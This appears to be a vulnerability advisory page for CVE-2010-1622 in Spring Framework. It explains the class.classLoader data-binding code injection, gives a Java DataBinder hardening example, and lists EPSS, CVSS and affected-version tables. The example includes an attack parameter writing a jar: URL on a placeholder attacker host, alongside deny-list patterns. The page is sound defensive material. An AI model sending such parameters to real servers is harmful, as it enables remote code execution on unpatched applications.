GHSA-vpr3-f594-mg5g · Severity: medium · Ecosystem: maven — Improper Control of Generation of Code ('Code Injection') in Spring Framework
SpringSource Spring Framework 2.5.x before 2.5.6.SEC02, 2.5.7 before 2.5.7.SR01, and 3.0.x before 3.0.3 allows remote attackers to execute arbitrary code via an HTTP request containing `class.classLoader.URLs[0]=jar:` followed by a URL of a crafted .jar file. The root cause is Spring MVC data binding: each request parameter name is interpreted as a nested bean property path on the form-backing object, and because every Java object exposes `getClass()`, the path `class.classLoader` walks from the form object to its `Class` and on to the web application class loader. Writing a `jar:` URL into that loader's `URLs` array makes the container pick up classes from the attacker-supplied jar when it next loads code, which is what turns a form submission into code execution on the server. The fixed releases stop exposing the `classLoader` (and related) properties of `Class` through bean introspection, so the property path no longer resolves.
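The defence that closes this bind path on any Spring version is to restrict what the data binder may set, which is also why upgrading and binder hardening are normally done together. The following is an added example written for this page, not code from the Spring project or from the advisory: it uses the real `DataBinder` API (`setAllowedFields`, `setDisallowedFields`, `getBindingResult().getSuppressedFields()`) against a hypothetical `SignupForm` bean, and the request parameters, including the attacker host in the `jar:` URL, are constructed placeholders. In a web application the same two `set*Fields` calls belong in an `@InitBinder` method on the `WebDataBinder`.

```java
import java.util.LinkedHashMap;
import java.util.Map;

import org.springframework.beans.MutablePropertyValues;
import org.springframework.validation.DataBinder;

public class SafeBindingDemo {

    /** Hypothetical form-backing bean that a controller binds request parameters to. */
    public static class SignupForm {
        private String username;
        private String email;
        public String getUsername() { return username; }
        public void setUsername(String username) { this.username = username; }
        public String getEmail() { return email; }
        public void setEmail(String email) { this.email = email; }
    }

    /**
     * Configure a binder the way an @InitBinder method should configure WebDataBinder.
     * An allow-list is the primary control; the deny-list is belt-and-braces so that
     * no property path can traverse getClass() even if the allow-list is later widened.
     */
    public static DataBinder hardenedBinder(Object target) {
        DataBinder binder = new DataBinder(target, "form");
        binder.setAllowedFields("username", "email");
        // Patterns are case-sensitive in Spring 2.5/3.0, hence both spellings.
        binder.setDisallowedFields("class.*", "Class.*", "*.class.*", "*.Class.*");
        return binder;
    }

    public static void main(String[] args) {
        // Constructed request parameters: two legitimate fields plus the property path
        // named in the advisory. The jar URL host is a placeholder, not a real exploit.
        Map<String, Object> params = new LinkedHashMap<String, Object>();
        params.put("username", "alice");
        params.put("email", "alice@example.test");
        params.put("class.classLoader.URLs[0]", "jar:http://attacker.example/evil.jar!/");

        SignupForm form = new SignupForm();
        DataBinder binder = hardenedBinder(form);
        binder.bind(new MutablePropertyValues(params));

        // The allowed fields are bound; the class loader path is dropped before any
        // property resolution happens and is reported as a suppressed field.
        System.out.println("bound username = " + form.getUsername());
        for (String suppressed : binder.getBindingResult().getSuppressedFields()) {
            System.out.println("rejected request field: " + suppressed);
        }
        if (binder.getBindingResult().hasErrors()) {
            System.out.println("binding errors: " + binder.getBindingResult().getAllErrors());
        }
    }
}
```

Suppressed fields are not binding errors, so log them: a `class.classLoader` parameter showing up in `getSuppressedFields()` is a high-confidence indicator that someone is probing for this CVE. The binder restriction prevents the bind from reaching the class loader on an unpatched 2.5.x/3.0.x application, but it is a mitigation, not a substitute for moving to 2.5.6.SEC02, 2.5.7.SR01 or 3.0.3.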
Conclusion & alert: CVE-2010-1622 is rated High Exploit Risk (67.6/100): CVSS Medium severity with medium exploitation likelihood (EPSS 1.55%). Core evidence: 4 public exploit references are indexed, all pointing at Exploit-DB. Mandatory action: public exploits are available, so assess exposure (any Spring MVC endpoint that binds request parameters to a form object on an affected version), apply mitigations (restrict bindable fields), and prioritize patching to 2.5.6.SEC02, 2.5.7.SR01 or 3.0.3.
| EDB-ID | Source | Kind | Published | Link |
|---|---|---|---|---|
| 13918 | exploit_db | edb | 2010-06-18 | Exploit-DB ↗ |
| — | nvd_ref | exploit_tag | — | Exploit-DB ↗ |
| — | nvd_ref | exploit_tag | — | Exploit-DB ↗ |
| — | nvd_ref | exploit_tag | — | Exploit-DB ↗ |
EPSS: the daily EPSS score estimates the probability that this CVE will be exploited in the wild within the next 30 days; the percentile ranks it among all scored CVEs (a higher percentile means a higher relative likelihood of exploitation, not a higher severity).
| # | Date | Old EPSS score | New EPSS score | Delta (New - Old) |
|---|---|---|---|---|
| 1 | 2026-05-22 | 1.52% | 1.55% | +0.03% |
| 2 | 2026-05-15 | 1.56% | 1.52% | -0.04% |
| 3 | 2026-05-06 | — | 1.56% | — |
Full EPSS history (61 records total)
CVSS metrics for this CVE.
| Base score | Version | Severity | Vector | Exploitability | Impact | Score source |
|---|---|---|---|---|---|---|
| 6.0 | 2.0 | MEDIUM | — | 6.8 | 6.4 | [email protected] |
| vendor | priority | summary | link |
|---|---|---|---|
| redhat | high | — | https://access.redhat.com/security/cve/CVE-2010-1622 |
Score note: The previous CVSS assessment 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) was provided at the time of initial analysis based on the best available published information at that time. The score has been updated to reflect the impact to Oracle products per Oracle Critical Patch Update Advisory - October 2015 (http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html). Other products listed as vulnerable may or may not be similarly impacted.
| Vendor | Product | Version | Raw CPE |
|---|---|---|---|
| oracle | fusion_middleware | 7.6.2 | cpe:2.3:a:oracle:fusion_middleware:7.6.2:*:*:*:*:*:*:* |
| oracle | fusion_middleware | 11.1.1.6.1 | cpe:2.3:a:oracle:fusion_middleware:11.1.1.6.1:*:*:*:*:*:*:* |
| oracle | fusion_middleware | 11.1.1.8.0 | cpe:2.3:a:oracle:fusion_middleware:11.1.1.8.0:*:*:*:*:*:*:* |
| springsource | spring_framework | 2.5.0 | cpe:2.3:a:springsource:spring_framework:2.5.0:*:*:*:*:*:*:* |
| springsource | spring_framework | 2.5.1 | cpe:2.3:a:springsource:spring_framework:2.5.1:*:*:*:*:*:*:* |
| springsource | spring_framework | 2.5.2 | cpe:2.3:a:springsource:spring_framework:2.5.2:*:*:*:*:*:*:* |
| springsource | spring_framework | 2.5.3 | cpe:2.3:a:springsource:spring_framework:2.5.3:*:*:*:*:*:*:* |
| springsource | spring_framework | 2.5.4 | cpe:2.3:a:springsource:spring_framework:2.5.4:*:*:*:*:*:*:* |
| springsource | spring_framework | 2.5.5 | cpe:2.3:a:springsource:spring_framework:2.5.5:*:*:*:*:*:*:* |
| springsource | spring_framework | 2.5.6 | cpe:2.3:a:springsource:spring_framework:2.5.6:*:*:*:*:*:*:* |
| springsource | spring_framework | 2.5.7 | cpe:2.3:a:springsource:spring_framework:2.5.7:*:*:*:*:*:*:* |
| springsource | spring_framework | 3.0.0 | cpe:2.3:a:springsource:spring_framework:3.0.0:*:*:*:*:*:*:* |
| springsource | spring_framework | 3.0.1 | cpe:2.3:a:springsource:spring_framework:3.0.1:*:*:*:*:*:*:* |
| springsource | spring_framework | 3.0.2 | cpe:2.3:a:springsource:spring_framework:3.0.2:*:*:*:*:*:*:* |